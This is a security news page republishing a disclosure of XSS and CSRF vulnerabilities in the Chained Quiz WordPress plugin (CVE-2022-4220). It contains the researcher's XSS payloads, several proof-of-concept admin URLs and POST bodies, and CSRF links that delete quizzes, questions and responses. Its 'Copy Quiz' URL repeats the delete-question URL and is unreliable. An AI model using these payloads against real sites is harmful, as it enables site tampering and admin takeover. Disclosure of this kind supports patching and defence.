Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-4220: WP plugin Chained Quiz multiple vulnerabilities

The Chained Quiz plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.2.4. This is due to missing nonce validation on the list_questions() function. This makes it possible for unauthenticated attackers to delete questions from quizzes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE
#xss#csrf#vulnerability#web#wordpress#php#auth

WordPress plugin Chained Quiz <= 1.3.2 multiple vulnerabilities

Author: Muhammad Zeeshan (Xib3rR4dAr)
Date: November 24, 2022

XSS

Description:
Multiple endpoints are vulnerable to XSS. When a logged in admin will visit a URL shared by an attacker, XSS will trigger which can be exploited to add a new admin user on website. sanitize_text_field is used while esc_attr should’ve been used.

Vulnerable Files:

chained-quiz/controllers/completed.php
chained-quiz/views/completed.html.php
and more

Payload:

" onmouseover=alert(1) style=position:absolute;width:100%;height:100%;top:0;left:0; a

URL Encoded Payload:

%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a

PoC:
While logged in as admin, visiting following crafted requests will trigger XSS:

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&datef=&points=&pointsf=&result_id=0&source_url=

Similarly, other endpoints in the plugin are also vulnerable to Admin Stored XSS even if DISALLOW_UNFILTERED_HTML is set to true, some are:

  • Visit [Social Sharing page](http://example.com/wp-admin/admin.php?page=chainedquiz_social_sharing as admin) and set Facebook App ID input to: " onclick=alert(1) a

  • Visit Integrations page as admin and set MailChimp API Key to : " onclick=alert(1) a
    XSS will trigger when input box will be clicked, or when page is hovered depending on XSS payload that is used.

    POST /wp-admin/admin.php?page=chainedquiz_social_sharing … facebook_appid=" onclick=alert(1) a

    POST /wp-admin/admin.php?page=chainedquiz_integrations&tab=mailchimp … api_key=someapikey" onclick=alert(1) a

CSRF

Delete a quiz:

/wp-admin/admin.php?page=chained_quizzes&del=1&id=2

Delete submitted responses:

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&offset=0&ob=tC.id&dir=desc&del=5

Delete a question from a quiz:

/wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1

Copy Quiz:

/wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1

Related news

CVE-2022-4213: Vulnerability Advisories Continued - Wordfence

The Chained Quiz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dn' parameter on the 'chainedquiz_list' page in versions up to, and including, 1.3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907